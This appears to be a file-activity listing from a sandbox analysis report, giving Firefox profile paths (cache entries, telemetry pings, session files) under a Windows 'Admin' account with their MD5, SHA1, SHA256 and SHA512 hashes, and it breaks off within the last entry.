C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\1eac24f8-1158-4ba8-a197-06761f26277c

MD5 ad448a2b4c7c041002a3ad8baccf76c9
SHA1 ccfa0db204e287e4a7c0feddeab96edcc4837451
SHA256 bfb30d2a4faf84aa3b7c24db5c8fb84f729ee49797c717e33e444eb6970eb83a
SHA512 cfbf7d21083318ddb094fa994bf8cb11475e1b767ae362a4bb7e137dad67a09711fe75461e5c1a0fe93b14a2f219f7897ccab402636ec9ea85273e38c030bd59

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F

MD5 6e61e1c340dccc6d4776b27d7bb0188f
SHA1 4c61bd04e0a1ef0e9206c9a5146450f906c51fba
SHA256 bf7680de14c4defa1c04f6effe0bb5dcc8a790ae1ca85af70d764740f04e9c2f
SHA512 fa1dd2a79cd0bb7b7beb7fe5550b40c24dc02d85440037dd22571b0e6b2de59426c1a8f07dfa73b80600e8a7f1ef5f972001b8e86c487072a276c19dc3500ab3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\AlternateServices.txt

MD5 421a3c678023fd22920e78c05dbae69a
SHA1 88f8cacbf8139f7cc7e78ce6d14936716e86a41c
SHA256 0c756b584bba58786d068b4cdd0695d0bc0ea727c04dd138ba71566499ff6488
SHA512 49fa25000f8c4bfddc7863485ebab7ff3eb3a13872276f043346ef6c06fea1baa32bb7fcc740e5559f64f0ec4a675cbed324689cf8c3d9d6ffc6fabb2ab7eb8a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\d227b851-73ae-4ece-8227-b26196b25836

MD5 637521c5d88f6dc7f7400ba036c5c9e7
SHA1 0eb19390235be90a42304b1d41cdf2340662ef34
SHA256 273541c8626d153dd16c03cbd63ad6e2f1b7ec3de9ee5029770f89a0fd4ec5dc
SHA512 33852d9a369a5f3db1ef3099ba50d45d05b2afb513cb52b152b109072b32674a572733b1f974fca7e0508a388442079ab6b235ce34362711be93edc5d56a6a5d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\protections.sqlite

MD5 49397db0486dc59d607907a086f40c9b
SHA1 08742ce9db9569062def08e99eea8470702feb7d
SHA256 890033ea279f13478e655150a823a5f84176d2f8f2ec3724dc61dfec775707c4
SHA512 fc8dad1ae2215cd96c41bb3e683670bb9138467677da46c19d1e58972775842a995b70123c22ea1efb659d043f5116d0c9dca422035a6646b35f81033c9f5f53

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\db\data.safe.bin

MD5 aa15303c8ecf25eec4ee7004c7facd9b
SHA1 0c1c80defdef0c7b6f93f5fab8dd0eb590a140e0
SHA256 be8e569e04d0286244f4ea224733f96c01bdfe68085d2dc780106ef9c0dc41bf
SHA512 cdc5d9637cf530f20996fd6f4bf8f4a4a11d772a8e388216ec05d660f2a32bc17f455ed09903b6de346dd4814d5574fbda96c557f3d6f897b993788c70d5b388

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\events\events

MD5 09a2c4d7472e5a3edcee9f141075a3fb
SHA1 8660e44d4203940a6019ca6f4e7616548852dfe2
SHA256 8f336f0c3c46a0cdcb95b75d1a95533b59c5bff4da51636cc3ef5be8bb2faa23
SHA512 6d8cc9151fc62d291ebfb2ab12b35a633bad464507b2adeef25eae62b4866fe27427b7ccf80f163e2d8f945b75c99a5f443ada9e0e2552853f95f5614ebb5fad

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\6AC9BD0802E051FCD579CC69A96979DE29682F3D

MD5 3c51fd2edbf1c1ab6a4110b9ada9575f
SHA1 bc8e01940af8ba57f5b022af0a38aecd86d68303
SHA256 5fb1dc1ad3bb0642daa23ee0e61a418bb3858287d5a5379c67bc66908f2887b3
SHA512 f418d57f789803e4a2f11c4de88d5ecc0f83020b56dfc50b65e21bab83a9c5ea1d4816ea4be3c0a2e62fa2e2b64326d3d2462d1494748e2702fd50ed192188e4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\A4CFB34965A084CF90916E0D471F850E35DB6F1A

MD5 768f5e6b1cd00c5cec590209918503a7
SHA1 f0ff66f16cdada976e37217fd427bc55a6959841
SHA256 ce81bb297c95c7d16a4ed9c475a1a7dbac39d9244dcf3b4894ad2a312eed12a3
SHA512 a7c20acd67e762387adaed332567f4152bb3eea9fd09dfa915cbbe3865170362419d0d2f388578f253ba069956bfb42fb4ed63751a6b3857b85ddcbd66ed6d4c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\ls\data.sqlite

MD5 d872d02766aa5fb12f723e087fe20d64
SHA1 9e1bcf9533a113826fdae092c39ce9b92b4caf34
SHA256 211f238c00f0120c3d2ecc27076ec2c9357fb402d8ec0ba306b91e5971caf057
SHA512 f9c5399572737b7911dcf0a3e167d41d3abee297d408110e0e89aa45999e579c7b6c58ada585ca72fa3a396cbb88da5b1e32ad07b1dcb468d0b4511e6248e44c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\ls\usage

MD5 c17e2755e3f942987fb5ac4ff4846331
SHA1 874087563e36d1176b1b10ca426ff10acebe7827
SHA256 809f108d5b50aed275f14f0b27cb8afadf73dc37841efb6c0e94eb28481ff263
SHA512 458cb9485f0ecbad42faecc809b9b919ba3003405f79fbf271c9da80fc7d800bb67e4c4e54f2719935a491bb3ac8f2392b342dd2ce171211545f3e5d6d32a4f7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\.metadata-v2

MD5 31da86d61375faf4e9cdb83c82902e4e
SHA1 93a5ecbbc47674f82813bad01bd8a691c6c1f7ad
SHA256 2d3757475a13e0a2b734536d39ae1489e31a11bad905dbd59f6f08eeb873a5d3
SHA512 eeece39b47be016c40977247048377899dfc9d0bbad47b332036de4dcb4419b505cdf3a67a1e110f010c19c83967f7342c8a2e2316b17a9f9ff196af7edc0020

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++www.google.com\ls\usage

MD5 512e743bb545159cb1d486968b533343
SHA1 944d41d0af9101dd61980d912e01cfe847291251
SHA256 4b0b002f2882a7813f745491d12cc037ef7399d877b31505589ac0a2d623a555
SHA512 4c4c095daef76ddfaaf9ef92729508681d3073e38ef3c1cff1dcc944400e48da53fd863163af81df54ca5b945632f0a23ae8d297b44bc10442f36f28080faab9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\5F4909CBE225CE96A9AB3579AE72E6ADA89428D9

MD5 09d81961ac0f866aea82bd1f2ade3ebf
SHA1 90e4d873194abcb629c715ecd76d871d389bc6fc
SHA256 ea36ccc8e18f1896cc53b10025229d219279e7c5f5299d275fa260efc0bac5de
SHA512 75567770ed6cd4e3cbab0e019a7f47804b58b2c79ffe8cbd7e13403a1fc333cc8ff56baac12cc6299eaf50b776457df0cb171491dc1460c12fceeafed32cfd69

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1BAACC87E20392184398D4457610FD10EA048180

MD5 b17431df1edbffa5ad0e4feb83f5278e
SHA1 00d11f00951b8c3d2a78022385cd4a63846b5c87
SHA256 421aa1f3cc6936bebd33549c6bfe1538684b295af21712f817cffd391b7b516f
SHA512 7c6993c063d0c0c4e771cc67e6d89cb7efb60599c242c5cb6c75970247d6205b92e2e9e50bc7639a8aec5362d93a18105939f298b45b016d4a7c62fa0362a979

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\28057EBB0875A1D95314E5D3D15B243F03E4AAD3

MD5 2c34728c8f15bff910d9db5d94c2c08f
SHA1 57cdc6cc6eb66a500da1e3d0c91f44707e19afc3
SHA256 5f3ecb707f267453848d6bff98a4a92c55f713e9bcc11d846685d3e162ed66c0
SHA512 0f967737efb34d6c80c22970a6ee5acad4820866ccc6b8dde7e0844fef0e46e6fa787acb4fa4df382062048a6184c577ffdfe0a6a13ea1e7dfd763f0bd1c7f5c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\3281DD4C79ACB61B312FD94931181EE61FD498DC

MD5 7cc7c0d965fbe9b353573fa87128437b
SHA1 7b24f38e98bfacc61c6e37a5771428fd18b86ac8
SHA256 bdf03ba42ebd18fe8ba4623ece678edb00041be29df1b0cbf764fc465d3c3478
SHA512 f8d7c31de3ef8cc5605d1d0538beb2967d784c2e1c92eb2ce96c57e7619f20866f1778e87e595e9e260aa7d247b1aa67fb1d81dfe341108f26f4d81b570e6ea5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\549C94847E35BE89DCE95DF86EA39378F22E5078

MD5 be3f00873a958129689b826f2eb259d4
SHA1 8d771bb8ca492e24a55b4e627dd692d981ad56ef
SHA256 09bff034e216bfa3abe74be9762b59ef40fd83c9aef02db7f0af5ec26f759563
SHA512 8e7263cc9bccbdb93e161f22f3da115562fec667e67f9c9fdf1cfe533df8d64d57483b92de12fcd061d3a553d5659486e3b05f2369c6d649d8d50ce97107cfd8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\2492994A253B970917AF5CDF605580B1C2DC16A0

MD5 c7c5f38c56bddc0bdd2880c4b7244503
SHA1 ceffb4fd2714e0997bb873d5e67f08a43b65362e
SHA256 6c357ef648f280b14d145f4ca68c1514a9f69117b6678072205ef3260b04df89
SHA512 a3906588720dae3c2696fd7eb1376268c8c541b5c1a3dae2423fa2a3b49babebe8212c9b0cd55aadaba3fc5852504907eaf5bf338b4f6a03ee13dffaea2b3f67

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\C5EE5FE6568BA9974B07449A0C19B89535148210

MD5 f2f5bc0b3616348c586638a5d091b960
SHA1 0f1785b06f5c96f0225099ac056e03db9afd34b6
SHA256 1c2a0ecf4d524b5af881f1e3831f31c636225d9728a4f06a9c2d58e5be28e9db
SHA512 7c4ef4e89338718ab178457d3fff1abd19ead16e677f570351ea6e7323355e08a3e27961e8bf5383a22b5bbb7be78f62864c0b9f21c54bece5956357bacfc3da

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\E127E5C228FFFFCCA2BB5B85AA302A961863F2CE

MD5 2f7860d3369e94e98827d3dab0741e62
SHA1 2c5d137b52ce1be5e1e732bc194116090e3bfb9a
SHA256 df4bd41272a43a9d80865e8db051b23c14e03b438155d1e043a2edc3e2985a3a
SHA512 d7c29d611dad23772c633a0b3c6e74febdb1f6fd428eac126183d95de23745cde488dd07bb38dfd6ce9750ebedfbf707cf653603b2f50ca9b95e501ad9b00793

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\D207CA89781848E7ECA4C658F22D4AEF1B168DD3

MD5 1d5fc8c6999f3e5d5efcb41a86973232
SHA1 12b918295166932f5a69a29a3a3212aa663e70ed
SHA256 32dfaa2c2478bd1db81a2db3e960d0562d88f63c45eeb337e880613a6e2cc541
SHA512 83fd6857bc5b9d72071eaef250cf4fb7d58555009d8bc11dc9b3f5c5de393ece13e086cbb488b1cb92c4bdb2e4aefdf0237395d015d6fc403507bf88782eb393

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\DAB5102FC101D7CF236AA0F7F0A1FA0C327821CA

MD5 6e81176dac245b00605c37f46d89e9b6
SHA1 26ace7c9d86ca7ef5c7f65440628489a80a6682a
SHA256 e828fa3491a79cd682b8e01452d0f0dde6305258829df68d38b39c6791d5db3e
SHA512 682be74b2aece527025d951565ccb041e42e69a5c6443005919810f6d95408e53204c03b5f618aabfc8f1a257550943f7bcb98f8727149b3172b94fffaee37ea

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\E8491E9F604125081439FF22CC81BD4ECEAFB687

MD5 4276b2b095b017cbf87e4e5dd70bc8fe
SHA1 fccdc4e5bc7e261686bbd789034d90ed31a7a51e
SHA256 2665d80585ca6cab383a49d25e4089d5960ba1819e9b2f1682ca1eef99df57b1
SHA512 df6cd4a29e89704874ba2544ba18c9173f9f26ff9f8d7b9afd209994f9e38194283908222a94cbfff45542115e0de65817fb3924bd477995f8e82b5870f50447

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\EF099C91F6C614FA770541C1821F5CABA7B41AE3

MD5 032c48ebf28cf8f95c752e87e06e53cf
SHA1 02c74d5b2073e809a6b8a0791424aaf0528514c6
SHA256 2975d22fb103fdc0616f10be1648c4bdd249955265ed22dadab6dbb0bedfbdb3
SHA512 12e40badd2a9680283b15a36279664a5f97dee9f111898d78cce7fd42732ce35a4757aa789a72d7380040c1452d8beed59a208f5eceec89aca847bc36cdbac35

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\386EAC11CA4B921A58AF901DCD97B7FA5108EE6F

MD5 a496129da5a29acbb6d98ddf6853e928
SHA1 cdb3ec36e7ae658b2b02c1fdd736f4cf9c12599c
SHA256 5b8c1a32ed4e1101a1de1654dde0786999b9d524f7a5a8f7a797ecf90a1fa78d
SHA512 ad9ded8bacf1ba35445fb83ba52e8372a8cd850a451ea395d2e74f8b7f41906a764170b8d514bf1b03f965282e9d7aed5f1000c893e7c1f39bee5ebd90587719

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\25E61D0F193C12CBBBE09A429B66070577263AAA

MD5 6afeb01e15792a831327e79e08599b33
SHA1 9bd8c11fe42223332d7d194f89f4d21d6237e5bb
SHA256 3f23a1e8d39cd4a6e55e850df0393e86fd053e2a0a6340525402fcfdcd3df029
SHA512 c705994a8f37504c35392231fc44d0275b299e369dc631c0fcdae3500877d6f21a77b27d73ecae5213ae85df2e1759fa791c60d74789f9c9ec8bd53cc1506f2c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\ADE37C375F37BA84A38CAED399A8A7D861D9CE21

MD5 2f0513e35aa4bfb1a9a1e20b217c0989
SHA1 df25439d5b1688af76553bcf17a62f2d18cc240c
SHA256 21f8e20a5bb175faa7e2feb30ff31852765088387642c44fe8b9734108ca45dc
SHA512 7b93ca9b446714819590fc57604485ff324552325365f152f8a536354febfb818b972c69ef897513104b198f47e0485fb2a37e759676458f771779fd00749025

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\68CD13CDE99B33434CC16167C7B0B073A64EC360

MD5 378e7876d85d4a72b9a7e708a52df379
SHA1 a933cfe0997e71d5c81382434e01158eccbbcaba
SHA256 097c5e69b4834aa8b87306d7eea8773bead4aedfbd98a8338cd60c098019f4ee
SHA512 36832c75df5381c305811cd6eb225b6130e0dd186bf0608524625b5c91f63e76137759849d942cbbee3b5ea833f1e253f7a37955ed05d6cc284579d7f4043d03

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\75E10B6CA912F3DD72B094B84BA83E8A0158EE6A

MD5 8a4491b905a2a8a39630a18c84c8b869
SHA1 7b44885637d04c994a7959999a8783ca543a43bb
SHA256 2ea195d7b8d4d80230376ab6d357058ce949672f239c51de8e994734a75fe1c1
SHA512 6ebbc1ae691963f065de760be70668c0db8780317d7783a8eff1993fcb1d4c41920f080be5004b9220aed85c9dbbd5b3337d601c6f349f34dfc880a8360bd742

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\CF082F6E5E460A360E0559F4CA94ED1B2773AD56

MD5 bb3668bf221d5485bf35af1a439a2be6
SHA1 b04ff271a4d2b6de245ef58f023a32138aca5616
SHA256 4032dea9543d88b535437d6f02b9fee71682df7005fa9db505dbcf88b415e15c
SHA512 c2c6d2ce3d382e8d543c49bbeed11c4f98da01405e0d2737f2d7c804ad6faa870d445f35a37aec287e0a11abddeb781d0a98682367b3579f80ca70a97462461a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\A7185B128F37007861637E9F7A1F3A17CC67A193

MD5 4f282b842a87d16a5c29c18a64d8b372
SHA1 93646485f86a85c92fe7107c24b7e0fd7a847f6a
SHA256 62f06e61e56763d722b1c8b05e271590d0d54e263bfd273d4cebe4a51eb61d56
SHA512 cf45014089d361758d025ba36bfda9d0d6a0a66e3412b53f1271868515f9a2c96eb1d0c0830622a21c66c1ad30b4a48a42d20f4ee3493e2d4c7d90c9f2e8f5f8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\B8342474273D37A8A890CF968C26F05C940C66F0

MD5 835a0ad1c02d689549b79883d885dbe0
SHA1 bcf8e45c6140a8ad8cef7864355f04e1105a97b8
SHA256 e8e03eb828568e8c27157e41ff10b455402fb12555da810907a2274c73728b89
SHA512 fa3c447188957ab3f2d5cb76c445d2a7f0f475b944f0be8dfe59e242984ebe5c2d179e350c952fb76f25a765e2b4435e0deb9a84c2540f8ce639d38292e5a1b9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\349EC0746A7A7C40F924DB3CF0957ABB04298440

MD5 c2545cc144e78087eaee218a0663654f
SHA1 870e4c842cc5034bdd2a602de3313417e10a32f2
SHA256 72f9e47941d68fe2be4316ed10f23baae8a4c3fa5ee55c6413f0b5c5de518e98
SHA512 330d89c0c82d8005a24869572404f88aec22f0578a7c7f81b774dfcdc8f5198f9b7a9ba2184e618d1d5ad8f87a56b39d9455c6414d1f4279f868aa0ead8a68d6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\D0AF9688BF547CD0A8E3B588F816B3FD56561337

MD5 3cd94ab3321d2b5baee005a53562f2aa
SHA1 77f5b40f6357b29b5d610e29cd9c668028a76d90
SHA256 01613602f79467e2fef8c2156e904ed82f2cbac415347a59d193a542061c893a
SHA512 cd1984d40d4612b40cea0e02a7716d46c1f01c8caae6ae775c2294d14f09ba41a3758d15bd1fa4bab03c12b5c44bdcc1cc60b12bc9120e27f23f2ef40a535973

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\AA760A3DBDC90071E7345327E1D0D2D023C9E436

MD5 6bf3fdf80f4b07a2f254973c6006e6af
SHA1 5d2c13edf34c7d33e23da952060d4745bcb0d8cf
SHA256 27a31e0398d085db5cc0b6eade850359cb16b32ed2b93bef6f8233a1c7a91553
SHA512 3d2466080488a55f0452a210ffbcc4892fd8b6f427286be43b05f9153d18b4715305306c02fe0b4fbc59668b2c4507c39009e201f1972a11c1d7ade8816f132c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\9F73202CCBC4D299254FA58CA5A84115CD3120AA

MD5 19236d5eeefcc17e9933d3cab4e12b78
SHA1 bb7eb56dabfbcd1f0168ed0ba52116fc8947f3fd
SHA256 1f72215c71e559ea9a9c39f87cf8762b6854083137da53a5f184feff33eaedb5
SHA512 f100e31ffb3719a1ac61e2dd696b49b417ddb1a6f265a8eebbfdccc87a2b44f756f1c1f980b176cfc55cee89a56451054048a85dc01c79826215bcc4958145e2

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\9A7F8872B335617C85443C8249C30C8F3D8C08B3

MD5 4b534c0c95f69e04f44c8ec0f1c7caf5
SHA1 d78546b68e65a8bf502008092f2e26fb5bf89a65
SHA256 89acee5f99aa26c1b9b5a9e9d96ad66ae63fef7ddb7545657d76781ca02015b8
SHA512 1c4054032efb197923d7ba9f6d7980fc64922edd07b973fe2cce4ca45f66c8ac6c8d360c1501508db3828640d6181fe109920bcaa9af8e5134f7142d2b56c1a7

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\0A7E7594E69C439CD52608F096A141AF3C4BD6DD

MD5 9dc4c2d8c8450a1a3d92662fc6e33cb2
SHA1 4ac2db90468cd70ac0b2d050880414f80d411928
SHA256 d337e32d5d22072bfe38ad7cccb5b9b6dda88fd81e582f1a29563d834eb2eca9
SHA512 94d039f1b63a43ddceefd350c6cc907f2b05148fc899fe2ff236a1ecc1fa99818afb3f9904e2053c8352603d19bac74ccfbf23a396d45e6488061ed8f45200b1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\8C329D8569CB535EB8A8DFE21B8A7DF316190487

MD5 dfc6aec9a3db7ebd7590a35d608cebe8
SHA1 89e848c4048fdf6a27c7c679de2a3d0fcb69ecd5
SHA256 08c6f8e8ff80b09d6e9dc73d17449e199dadacef0c7972b8a974b9a12217f092
SHA512 c4d38f76f061004d96cd2911c05771c746ddaa35ea498dbdcc3d62a5b4bb436171d5a34b14b70faf458e37efb5d5994af8c3619fe8b72f9192cd70faae7ae8f4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\619495392A1160857D64FE2ADBFB41504AE56622

MD5 131361766c50d2bfda32d4867eed5957
SHA1 486fc943fcde9dc9971b0b14d97cd66b1ce79eea
SHA256 60f74f6a3960c2ffce46d7115323c6411cf9a1dfc65270c753014230070fe0ca
SHA512 47d3238eb27e5def5ae912e3691c42de22950363dce5ed291b0848857fbc4af12b8deed74a30c4005585b3c081c3e1ac819a08c69e74b2fd7adb89a1286e4010

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\32EBD18D648D0C2686A8CEA2660881510BCE9AFB

MD5 f8aa04400c195e4686c800f28d89f716
SHA1 afe0b12094e50077a6767dd86c4405fdfba8e219
SHA256 ed18805022b6a508d97f0bb4c82f55361e4872cd887051df0efbe9b6bf88dede
SHA512 27699c1e913be3e087c073d6e71aa08d685e789ba336d119c4b708a057926192383dcafb005045523b1d6de2f7b30432657cfbc140f8895c8f15b85afd8e8af9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\81EC6C1C952C9B69019B0101287C103BB1192909

MD5 478aced0f9949ccb75601e4256fdf08f
SHA1 94742ea5cad93a9e117c84a942009fde3226ee5b
SHA256 a5f1dc0d03b9a6d0ce764c422b62894d712560ec8aa33dc8c6772c707b21d1d5
SHA512 fc51e0f4568a692164b521d2c82b74d17b569324d521a14ecc53185291988cb5be739266f455328636837410a8be3ba47047d5b8b9c6779f67a705f99267c3a8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\2CFCC364A7B2E7A8E9AB96BD93785B6E9759AA7A

MD5 5f2f72dc28bad6bff0c3482fdb34d853
SHA1 fb045e011b5815bebc4690837f0edac6d824b6fd
SHA256 56e629b18620ce7ddc8bd761244e930b45e99f3d47b1f2f69848daccf62013c8
SHA512 3f5d3f4b469c5a311bf35d58a80d8f392b78edd670f318a807cefc77d3355043a28c1df29fcbde7b21c1ee2f03d4386635f96fedf597c6e8d2328ef2937e9042

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1BD049D77EA7AE92A7679A43976B47361EFA250A

MD5 a3f8f3fbb9d61587580cfeb7e3e8239b
SHA1 2f22ea4cdd1ef6447d369dfc2fc617c6e81b3db9
SHA256 7fbbd11a28683297199486e7d9061ae7243fe0b6e303080063ba71d99984dae3
SHA512 f41312d8875f2bffc8749f93475b9b8c6ab5f9a9871020dedf6e791a57105105cee3b4b569e475d829d061afcfa3721b8141da388e4855abecee75490e23581c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\59E775949006F35F294214D82A34914D2424484A

MD5 0641fe6c5415f8c3b354721f11cd0c7f
SHA1 e0d3b7d6d29d3271a526dab94a2407e8f4032b9a
SHA256 eb6382ba468e6b77edcec9668790c0df662aedb4337e608f8ae56bb2969a810e
SHA512 d9bb71f203f0cffed2a47e68cc1d47b913ca11b31230e485e2bb7c8a4f5ec43b736062c8c334fc21368059c15eb269ca35ddbd017f4db191d951740eea19bb6f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\BE91A47AE98719A666A0AE5DBC6C5CAFCB6513CF

MD5 2dea996d476ead4c4d4271e3651b9dcc
SHA1 2c27ba7aa543a07ef391789358b745a848118b71
SHA256 2d38012fd4fea03c6023ab858a13cce561a666e329c6706b53abea7828a20c17
SHA512 6b69846f60060fb8cec8c41d8f472808376425299475a4a5b470fd14da622ee8e47668c0f180c9e5c77653c1e9a29ee6f3139831a2edded9573b7d9c3ad34662

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1DF431202663B96214352B1DFE36A726B4137A2F

MD5 4368bede1e1315176fb73f06ce82569a
SHA1 585d07c1aa1c7d22fbec3bef5dbe6b7cc83bc6bb
SHA256 9394bde1f39748f599944b345d9c1eecd57fe32c7cd2d63cfeb29d347cce37d6
SHA512 01ca4518e19961054feefed56320e6ed808589fec8b0fee7a01f8398ad1861e31d5e268713e0de79db14e874930b93a0628b4ac38569f5dbd0b7dda2e7bf98ea

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\D7EB97B69BE4CE4C6BB9083B4E08A4B504BFC2E3

MD5 67f443e93881f3a8729a68f8ca7d010c
SHA1 7d991be184bd62f7aca08cbab25eda10d7ec3407
SHA256 702188efa49275a844784ec0e29889042968d2cd687726829211b9bb408817c2
SHA512 13c5fed144cac20aebf3fd4a20139499f80e85affed489096afae28abbfad3040dea010330017fdc076d6d118338b046512cfd931d0cff9abd43215ece592a9a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\73C7F1E668813518B669C33D69033779C04F9F54

MD5 8ce1dbe213c521295d982186a64f2d66
SHA1 86f224a6bf9f14ef58014ef3e81fe94e13f5fe9f
SHA256 51da84548b383246cb6acb4c61391e522547317f87a9082fdae7db0ee47518be
SHA512 195bb8d565dc4f5d43df9185fff2cc8e024099fcdcaa706c4063981951a80f8a852e381f6be070aec807424cd8cbcaa3f3a4dcc188a5f7915229414203484835

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\71BF779DFBCE1307F42244F92E6190F178BC7120

MD5 22aa739b37f72115d255d12d67055e89
SHA1 c45f3ebb2ef52f0f7aef0c6d8b750270a6e6fe09
SHA256 96653ee7fa907a7d895f6474e04196b1d0a24bb27023e264643d61d750c74f99
SHA512 758632e16636457f22f6e88888382a6e1397b792a263c99aa01bf695033dad8ead082255e1b3c2816315a05136b1314e9848730ad0968bdaf56fed142578cb51

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\6586F7B38489859730F9ADC10B28BFE43E7639AA

MD5 d1cf0bcb9133ac2dbd48c9e1b52c4cc1
SHA1 22369e29f5c235e021d09a55c073e2a7716e7803
SHA256 b6f779a3ab8cc2628e3d52d8b896e9c761363ce462eb32e52433f32fa9eb4e7b
SHA512 f43987f740933bd9df1968dcc620893816641a0e8eb6c496b3c5221e05619b1bbf103d2d2cac4b23b5cdb5767a6aa3b4c3e8e39d2bce713a6404edd7462bc0cf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++www.google.com\.metadata-v2

MD5 d53c4d4f0b260dde2b2d15c8dcca8d57
SHA1 78edb9c35231166155194f67b1072b0349d0c47c
SHA256 56d960ec7a89b4cf1b0b5db5b243d9f1dc31e5d6b516764cbe0311ac09ed5248
SHA512 dbca4331417a5e2ecba9a0aef370b62e95ee4a528da91b562716357d669c47f927e982eef4b82997674f2168d809428bd387e1f930267fb654942619f08061b2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 0c05beb316805ddf8a308efc4e080a51
SHA1 f4d4467d8b09e9d7a37228cb24e0ecde718184dd
SHA256 c832b8d343889538d94a62b6c2867d539cd63909e51009b6322ccab591c91aae
SHA512 fe766c7019c3b53469745ecc95aabdf0dfd5d734a27b713d9fcc9214bc72e329b3bd0d756a14068c550cb9d8fb20da6046a8609e143012c3cc82893a10d61245

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

MD5 99601438ae1349b653fcd00278943f90
SHA1 8958d05e9362f6f0f3b616f7bfd0aeb5d37967c9
SHA256 72d74b596f7fc079d15431b51ce565a6465a40f5897682a94a3f1dd19b07959a
